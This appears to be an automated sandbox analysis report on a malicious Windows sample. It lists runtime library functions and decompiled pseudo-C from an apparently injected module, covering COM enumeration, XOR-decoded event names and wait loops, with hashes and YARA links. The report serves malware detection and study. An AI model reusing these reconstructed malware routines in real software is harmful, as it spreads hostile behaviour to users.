OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,022B7F25,?), ref: 022B9F0B
GetLastError.KERNEL32(?,00000001,?,?,?,022B7F25,?), ref: 022B9F2A

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 60b86161555d5a1f1d5075df6f3da9df8a18eed635b06f99c02ba075fcd79974
Instruction ID: d2d0e8bfe920072d2ae5395c0c836458f94e37d06480588f6f4e0ce5b4c931ee
Opcode Fuzzy Hash: 60b86161555d5a1f1d5075df6f3da9df8a18eed635b06f99c02ba075fcd79974
Instruction Fuzzy Hash: 4AF06D74EE43839FD7138BE4B91DB953B60AB40795F004D16F642C61C6EBB480A1CF15

Uniqueness

Uniqueness Score: -1.00%

Function 004272B4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00427313
_memset.LIBCMT ref: 0042739C
__invalid_parameter.LIBCMTD ref: 004273FB

Strings

P, xrefs: 00427410

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset$__invalid_parameter
String ID: P
API String ID: 2178901135-3110715001
Opcode ID: 36afb094fbf91bde458c9f04504b5550f94f71234a4dc47069f13a2b3c191332
Instruction ID: ff1ab50e4a8da51c6aed1eb7c42e00a9d86741e526bb0bae16782f3d79194faf
Opcode Fuzzy Hash: 36afb094fbf91bde458c9f04504b5550f94f71234a4dc47069f13a2b3c191332
Instruction Fuzzy Hash: 1341BC30A08219EBCB14DF58E8457AE7771FB00324F64C66AEC255B3D1C3799951CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0042C1E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C25A
__aullrem.LIBCMT ref: 0042C42A
__aulldiv.LIBCMT ref: 0042C44C

Strings

9, xrefs: 0042C45D

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 847f5d783817a64a465974e632cf6f5caf82a10921107752677570f2b7e61ad4
Instruction ID: 60bf2d10f6abf1674f58a41acd4e22dac65445bd2313a9a7bb887a148b80a0ea
Opcode Fuzzy Hash: 847f5d783817a64a465974e632cf6f5caf82a10921107752677570f2b7e61ad4
Instruction Fuzzy Hash: E54135B0E10229DFDB20CF48D881BAEB7B4FF85314F50849AD549AB200C7785E81CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A5E6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A612
__aullrem.LIBCMT ref: 0042A7DF
__aulldiv.LIBCMT ref: 0042A801

Strings

9, xrefs: 0042A812

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 9c292ae1dbd51e7e4058b7c24572866a36c0beac325e28ac9a73a2ffc7614e33
Instruction ID: 84d6122f9c34beccd58d4e428a6470208c4d691562115a695ee842527cb5fd4f
Opcode Fuzzy Hash: 9c292ae1dbd51e7e4058b7c24572866a36c0beac325e28ac9a73a2ffc7614e33
Instruction Fuzzy Hash: C6411775E01229DFDB24CF58DC89BAEB7B5FB84304F54819AD449A7240C7389E91CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042C22E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C25A
__aullrem.LIBCMT ref: 0042C42A
__aulldiv.LIBCMT ref: 0042C44C

Strings

9, xrefs: 0042C45D

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 9f8bf37166e393c87952b46ab01db12bff4d9369821a492f8aa85efb0c424c87
Instruction ID: 2bf944a235f93b1e4b29e10379b60506258713ca41dfca8dc5a8c42121dde725
Opcode Fuzzy Hash: 9f8bf37166e393c87952b46ab01db12bff4d9369821a492f8aa85efb0c424c87
Instruction Fuzzy Hash: 194116B1E40129DFDB24CF48D981BAEB7B5FF85310F50859AD589A7201C7385E81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042C1D7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C25A
_get_int64_arg.LIBCMTD ref: 0042C282
__aullrem.LIBCMT ref: 0042C42A
__aulldiv.LIBCMT ref: 0042C44C

Strings

9, xrefs: 0042C45D

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 4714ab5dc69ee6a295baf986a80ddc020e31d4475cbc20599db88215d06293b4
Instruction ID: b7c93e90d767784c0932de63ac21d0d2f3b6555ccbfcb1aa7ad353ad6b8bf28d
Opcode Fuzzy Hash: 4714ab5dc69ee6a295baf986a80ddc020e31d4475cbc20599db88215d06293b4
Instruction Fuzzy Hash: F24124B1A40129DFDB20CF48D981BAEB7B4FB85310F5085DAE549A7200C7385E80CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A595, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A612
_get_int64_arg.LIBCMTD ref: 0042A63A
__aullrem.LIBCMT ref: 0042A7DF
__aulldiv.LIBCMT ref: 0042A801

Strings

9, xrefs: 0042A812

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 6362fca3f0a21a2c4d3e1b3d5fad6faee9cde59bbf2a382a04e27ce78b305104
Instruction ID: 3f55e8fff515ffad3fab03126948b95154aeb57b676acdd403ae9f4bdb469bca
Opcode Fuzzy Hash: 6362fca3f0a21a2c4d3e1b3d5fad6faee9cde59bbf2a382a04e27ce78b305104
Instruction Fuzzy Hash: 1F410775E05228DFDB24CF58D889BAEB7B5FB84304F5481DAD449A7240C7389E91CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00426113, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00426164
__invalid_parameter.LIBCMTD ref: 004261FD
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042620F

Strings

u!h8d@, xrefs: 004261B3

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: Locale$UpdateUpdate::~___invalid_parameter_memset
String ID: u!h8d@
API String ID: 255745848-3039543186
Opcode ID: 2b49365f5bff4aac0e7ca6481663ff2a9a328998f6363769a4adc87676ce7d20
Instruction ID: 4d3d35df8eda1f27d7a90ee0b940f25f0450abaaa7a428bd50e7309c433467cc
Opcode Fuzzy Hash: 2b49365f5bff4aac0e7ca6481663ff2a9a328998f6363769a4adc87676ce7d20
Instruction Fuzzy Hash: 5231A070B00219DBCB24CF58DC42BEE7371BB00304F62862AF825673D2D779A961CB99

Uniqueness

Uniqueness Score: -1.00%

Function 022B4E05, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E022B4E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x22bd2a8; // 0x24ba5a8
					_t5 = _t103 + 0x22be038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x22bc290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x22bd2a8; // 0x24ba5a8
												_t28 = _t109 + 0x22be0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x22bd2a8; // 0x24ba5a8
														_t33 = _t79 + 0x22be078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x022b4e0a
0x022b4e13
0x022b4e14
0x022b4e18
0x022b4e1e
0x022b4e24
0x022b4e2d
0x022b4e33
0x022b4e3d
0x022b4e3f
0x022b4e45
0x022b4e4a
0x022b4e55
0x022b4e5b
0x022b4e60
0x022b4f82
0x022b4e66
0x022b4e66
0x022b4e73
0x022b4e79
0x022b4e7f
0x022b4e83
0x022b4e89
0x022b4e96
0x022b4e9a
0x022b4ea0
0x022b4ea3
0x022b4eab
0x022b4eac
0x022b4eb0
0x022b4eb4
0x022b4eb7
0x022b4eba
0x022b4ec0
0x022b4ec9
0x022b4ecf
0x022b4ed0
0x022b4ed3
0x022b4ed4
0x022b4ed5
0x022b4edd
0x022b4ede
0x022b4edf
0x022b4ee1
0x022b4ee5
0x022b4ee9
0x00000000
0x00000000
0x022b4eef
0x022b4ef8
0x022b4efe
0x022b4f08
0x022b4f0c
0x022b4f0e
0x022b4f1b
0x022b4f1f
0x022b4f27
0x022b4f2c
0x022b4f3e
0x022b4f40
0x022b4f46
0x022b4f46
0x022b4f4f
0x022b4f4f
0x022b4f51
0x022b4f57
0x022b4f57
0x022b4f5a
0x022b4f60
0x022b4f63
0x022b4f6c
0x00000000
0x00000000
0x00000000
0x022b4f6c
0x022b4ec0
0x022b4eba
0x022b4ea3
0x022b4f72
0x022b4f72
0x022b4f78
0x022b4f78
0x022b4f7e
0x022b4f7e
0x022b4f87
0x022b4f8d
0x022b4f8d
0x022b4e4a
0x022b4f96

APIs

SysAllocString.OLEAUT32(022BC290), ref: 022B4E55
lstrcmpW.KERNEL32(00000000,0076006F), ref: 022B4F36
SysFreeString.OLEAUT32(00000000), ref: 022B4F4F
SysFreeString.OLEAUT32(?), ref: 022B4F7E

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 7270cefbe7f7aefd8bbe3146021ed5e185605cf3d75104630fe9f9b8dd924eac
Instruction ID: cd3128fed308e78e331778d61c474b2c09025b2b03edc80e37b7e533f32b1076
Opcode Fuzzy Hash: 7270cefbe7f7aefd8bbe3146021ed5e185605cf3d75104630fe9f9b8dd924eac
Instruction Fuzzy Hash: EB517075D00509EFCB01EFE4C898DEEB7BAEF88744B154984E915EB215DB31AD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 022B137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 022B13B6
SysFreeString.OLEAUT32(00000000), ref: 022B149B

Part of subcall function 022B4E05: SysAllocString.OLEAUT32(022BC290), ref: 022B4E55

SafeArrayDestroy.OLEAUT32(00000000), ref: 022B14EE
SysFreeString.OLEAUT32(00000000), ref: 022B14FD

Part of subcall function 022B52B9: Sleep.KERNEL32(000001F4), ref: 022B5301

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 169f6ef10f5edc83d5224bf17bec5ba88bcb215db0facb248c63f5f80909b15a
Instruction ID: a350cc04ccc240ad62deb414954b2e497f4a40b5fc5dd505deb8870e4191e599
Opcode Fuzzy Hash: 169f6ef10f5edc83d5224bf17bec5ba88bcb215db0facb248c63f5f80909b15a
Instruction Fuzzy Hash: FC519336910609EFDB02CFE8D454ADEB7B6FF88744B148829E908DB224DB71ED15CB50

Uniqueness

Uniqueness Score: -1.00%

Function 022B29ED, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E022B29ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E022B8B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E022B4AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E022B2F01(_t101,  &_v236, _a8, _t96 - _t81);
					E022B2F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E022B4AA4(_t101, 0x22bd1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E022B4AA4(_a16, _a4);
						E022B28BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L022BAF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L022BAF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E022B9947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E022B4506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E022BA708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x22bd1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x022b29f0
0x022b29fc
0x022b2a02
0x022b2a07
0x022b2a0b
0x022b2b68
0x022b2b6c
0x022b2b6c
0x022b2a11
0x022b2a15
0x022b2a19
0x022b2a1c
0x022b2a27
0x022b2a2d
0x022b2a32
0x022b2a35
0x022b2a4f
0x022b2a5b
0x022b2a64
0x022b2a6e
0x022b2a73
0x022b2a75
0x022b2a78
0x022b2b26
0x022b2b2c
0x022b2b3d
0x022b2b50
0x022b2b60
0x00000000
0x022b2b65
0x022b2a81
0x022b2a88
0x022b2a8c
0x022b2a92
0x022b2a94
0x022b2a96
0x022b2a98
0x022b2a9a
0x022b2aa4
0x022b2aa9
0x022b2aab
0x022b2aad
0x022b2aae
0x022b2aaf
0x022b2ab0
0x022b2ab7
0x022b2abe
0x022b2ac1
0x022b2ac1
0x022b2a8e
0x022b2a8e
0x022b2a8e
0x022b2ac9
0x022b2ad1
0x022b2ada
0x022b2adf
0x022b2adf
0x022b2ae4
0x00000000
0x00000000
0x022b2ae6
0x022b2ae9
0x022b2af3
0x00000000
0x00000000
0x022b2af5
0x022b2af5
0x022b2aff
0x022b2adf
0x022b2ae4
0x00000000
0x00000000
0x00000000
0x022b2ae4
0x022b2b09
0x022b2b0c
0x022b2b0f
0x022b2b16
0x022b2b16
0x022b2b23
0x00000000
0x022b2b23
0x022b2a1e
0x022b2a22
0x022b2a23
0x022b2a25
0x00000000
0x00000000
0x00000000
0x022b2a25
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 022B2A9A
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 022B2AB0
memset.NTDLL ref: 022B2B50
memset.NTDLL ref: 022B2B60

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 03de0a219767d81fb95b429bf7fe6d07f4372c38fdf787faa1aefacab4cada42
Instruction ID: 11dfbf6349b12e8385c5d2f100cb7dc2d9a35198ad61a3daca4c13015e88d4aa
Opcode Fuzzy Hash: 03de0a219767d81fb95b429bf7fe6d07f4372c38fdf787faa1aefacab4cada42
Instruction Fuzzy Hash: 95419F71A20319EBDB22DFE8CC84BDE776AEF45350F008629B919A7188DB74A944CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004183E7, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

__initterm.LIBCMTD ref: 004184DA
__initterm.LIBCMTD ref: 004184EC
__CrtSetDbgFlag.LIBCMTD ref: 004184FF
___freeCrtMemory.LIBCMTD ref: 00418516

Part of subcall function 0041B7D0: RtlEncodePointer.NTDLL(00000000,?,0041861B,?,?,0041B940), ref: 0041B7D7

Memory Dump Source

Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __initterm$EncodeFlagMemoryPointer___free
String ID:
API String ID: 2654307729-0
Opcode ID: 22c5ff8650e5ecce261691c2f25c41b6d99237bbe12ff81dfca7ab2a07f819b6
Instruction ID: 6bd00bf905759a03933d705d0fd224de655e123b4229a8450067f60dcc050531
Opcode Fuzzy Hash: 22c5ff8650e5ecce261691c2f25c41b6d99237bbe12ff81dfca7ab2a07f819b6
Instruction Fuzzy Hash: E041E575D00209EFDB14DFA4E584ADEBBB2FB48314F24426EE411B7690DB385881CB69

Uniqueness

Uniqueness Score: -1.00%

Function 022B6150, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E022B6150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x22bd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x22bd2a8; // 0x24ba5a8
				_t3 = _t8 + 0x22be87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E022B10B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x22bd2ac, 1, 0, _t30);
					E022B8B22(_t30);
				}
				_t12 =  *0x22bd25c; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E022B8F1B() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E022B3485(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x22bd10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E022B8B7B(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x022b6151
0x022b6158
0x022b6162
0x022b6166
0x022b616c
0x022b617b
0x022b6182
0x022b6186
0x022b6198
0x022b619a
0x022b619a
0x022b619f
0x022b61a6
0x022b61fd
0x022b61fd
0x022b6203
0x022b6205
0x022b6205
0x022b620f
0x022b6213
0x022b6225
0x022b6225
0x022b6229
0x022b622f
0x022b622f
0x00000000
0x022b61bf
0x022b61c4
0x022b61cc
0x022b61d0
0x022b61d4
0x022b61d4
0x022b61e1
0x022b61e5
0x022b61e9
0x022b623e
0x022b6244
0x022b6244
0x022b61f7
0x022b61fb
0x022b6232
0x022b6234
0x022b6237
0x022b6237
0x00000000
0x022b6234
0x022b61fb
0x00000000
0x022b61e5

APIs

Part of subcall function 022B10B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04779C18,00000000,?,?,69B25F44,00000005,022BD00C,?,?,022B30FE), ref: 022B10E7
Part of subcall function 022B10B1: lstrcpy.KERNEL32(00000000,00000000), ref: 022B110B
Part of subcall function 022B10B1: lstrcat.KERNEL32(00000000,00000000), ref: 022B1113

CreateEventA.KERNEL32(022BD2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,022B991F,?,00000001,?), ref: 022B6191

Part of subcall function 022B8B22: RtlFreeHeap.NTDLL(00000000,00000000,022B131A,00000000,?,?,00000000), ref: 022B8B2E

WaitForSingleObject.KERNEL32(00000000,00004E20,022B991F,00000000,00000000,?,00000000,?,022B991F,?,00000001,?,?,?,?,022B7D37), ref: 022B61F1
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,022B991F,?,00000001,?), ref: 022B621F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,022B991F,?,00000001,?,?,?,?,022B7D37), ref: 022B6237

Memory Dump Source

Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true

Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: b0a1d73652e75bc247f734b350bd5976d6b0dcf2d0f9443883fb804c555ca3b6
Instruction ID: 4a2eb19b2c949fd750520150ba4ecfff7750032b55263d6187a9914ffb0380e3
Opcode Fuzzy Hash: b0a1d73652e75bc247f734b350bd5976d6b0dcf2d0f9443883fb804c555ca3b6
Instruction Fuzzy Hash: 8221F232D713525FD7235EE8A848BFB73ADEF88B94B090A25F945D6219DBB0C8018A51

Uniqueness

Uniqueness Score: -1.00%

Function 022B9870, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E022B9870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E022B2931(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E022B8DAB(_t23);
						}
					}
					return _t38;
				}
				if(E022B155A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x22bd2ac, 1, 0,  *0x22bd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E022B5BC0(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E022B4B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E022B4FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E022B6150( &_v32, _t39);
					goto L13;
				}
			}

0x022b9870
0x022b987d
0x022b9883
0x022b9884
0x022b9885
0x022b9886
0x022b9887
0x022b988b
0x022b9897
0x022b989b
0x022b9923
0x022b9923
0x022b9926
0x022b9928
0x022b9930
0x022b9930
0x022b9936
0x022b9939
0x022b9939
0x022b9936
0x022b9944
0x022b9944
0x022b98ae
0x022b98b0
0x022b98b0
0x022b98c7
0x022b98cb
